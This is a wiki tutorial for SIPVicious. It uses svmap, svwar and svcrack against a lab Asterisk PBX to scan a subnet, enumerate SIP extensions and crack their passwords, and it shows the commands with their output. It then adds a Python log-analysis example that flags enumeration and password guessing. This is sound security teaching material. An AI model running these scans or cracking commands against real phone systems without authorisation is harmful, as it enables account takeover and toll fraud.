Getting Started

Pinaki Mondal edited this page May 18, 2020 · 2 revisions

Running SIPVicious tools for the first time.

Introduction

This guide assumes that you're running either a Linux or a Windows box. It also assumes that you're sufficiently comfortable with the command line. We will get a virtual machine running Asterisk PBX as a target and launch SIPVicious tools against it.

Preparation

For our local environment, we will need a virtual machine with Asterisk running on it. There are other options, such as FreeSWITCH, which you can use according to your needs and taste. In this example we will be using Asterisk as our target.

Setting up the Victim box

Once you have Asterisk up, make sure to create a few extensions. In our lab we have extensions 100, 101 and 123. Choose a numeric password for extension 100, no password for 101 and an alphabetic password like secret for 123.

Making use of SIPVicious tools

I'll assume that your network is on the 192.168.1 subnet from now on. Replace that with your own subnet.

First run svmap against your subnet to find your Asterisk box:

[you@box sipvicious]$ ./svmap 192.168.1.1/24

+--------------------+--------------+
| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
+--------------------+--------------+

You should get results similar to the above. If not, make sure that you're scanning the right network.

To identify the extensions that you created previously:

[you@box sipvicious]$ ./svwar 192.168.1.103

+-----------+----------------+
| Extension | Authentication |
------------------------------
| 123       | reqauth        |
| 100       | reqauth        |
| 101       | noauth         |
+-----------+----------------+

As you can see, extension 101 does not require authentication. Finally, to crack the password for 100, we just run the following command:

[you@box sipvicious]$ ./svcrack 192.168.1.103 -u 100

+-----------+----------+
| Extension | Password |
------------------------
| 100       | 100      |
+-----------+----------+

To crack an alphanumeric password we need to use a dictionary file. Create a text file called "dictionary.txt" containing your password, then pass it to svcrack with -d:

[you@box sipvicious]$ ./svcrack 192.168.1.103 -u 123 -d dictionary.txt

+-----------+----------+
| Extension | Password |
------------------------
| 123       | secret   |
+-----------+----------+

Following that, you can use the credentials with a SIP softphone of your choice.
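
Seen from the PBX side, the svwar and svcrack runs above appear as bursts of failed registrations from a single source. The following is an added example, not code from SIPVicious or the original page: it assumes the lab PBX writes chan_sip-style "Registration ... failed" NOTICE lines, runs over constructed sample log lines, and uses a hypothetical `classify` function with illustrative thresholds.

```python
import re
from collections import defaultdict

# Constructed sample lines, modelled on Asterisk chan_sip NOTICE messages
# (assumed log format; addresses match the lab subnet used on this page).
SAMPLE_LOG = """\
[2020-05-18 10:00:01] NOTICE[2211] chan_sip.c: Registration from '"102" <sip:102@192.168.1.103>' failed for '192.168.1.50:5060' - No matching peer found
[2020-05-18 10:00:01] NOTICE[2211] chan_sip.c: Registration from '"103" <sip:103@192.168.1.103>' failed for '192.168.1.50:5060' - No matching peer found
[2020-05-18 10:00:02] NOTICE[2211] chan_sip.c: Registration from '"104" <sip:104@192.168.1.103>' failed for '192.168.1.50:5060' - No matching peer found
[2020-05-18 10:00:05] NOTICE[2211] chan_sip.c: Registration from '"100" <sip:100@192.168.1.103>' failed for '192.168.1.50:5060' - Wrong password
[2020-05-18 10:00:05] NOTICE[2211] chan_sip.c: Registration from '"100" <sip:100@192.168.1.103>' failed for '192.168.1.50:5060' - Wrong password
[2020-05-18 10:00:06] NOTICE[2211] chan_sip.c: Registration from '"100" <sip:100@192.168.1.103>' failed for '192.168.1.50:5060' - Wrong password
[2020-05-18 10:07:40] NOTICE[2211] chan_sip.c: Registration from '"123" <sip:123@192.168.1.103>' failed for '192.168.1.20:5060' - Wrong password
"""

# Extract the targeted extension and the source IP from a failed-registration line.
FAILED = re.compile(
    r"Registration from '.*?<sip:(?P<ext>[^@>]+)@[^>]*>' failed for "
    r"'(?P<src>[\d.]+):\d+' - "
)

def classify(log_text, enum_threshold=3, guess_threshold=3):
    """Return {source_ip: set_of_findings} based on failed registrations."""
    attempts = defaultdict(lambda: defaultdict(int))  # src -> ext -> failures
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            attempts[m["src"]][m["ext"]] += 1
    findings = {}
    for src, per_ext in attempts.items():
        tags = set()
        # Many different extensions from one source: svwar-style enumeration.
        if len(per_ext) >= enum_threshold:
            tags.add("extension-enumeration")
        # Repeated failures against one extension: svcrack-style guessing.
        if any(n >= guess_threshold for n in per_ext.values()):
            tags.add("password-guessing")
        if tags:
            findings[src] = tags
    return findings

if __name__ == "__main__":
    for src, tags in classify(SAMPLE_LOG).items():
        print(src, sorted(tags))
```

The single failure from 192.168.1.20 stays below both thresholds, so an ordinary mistyped password is not flagged.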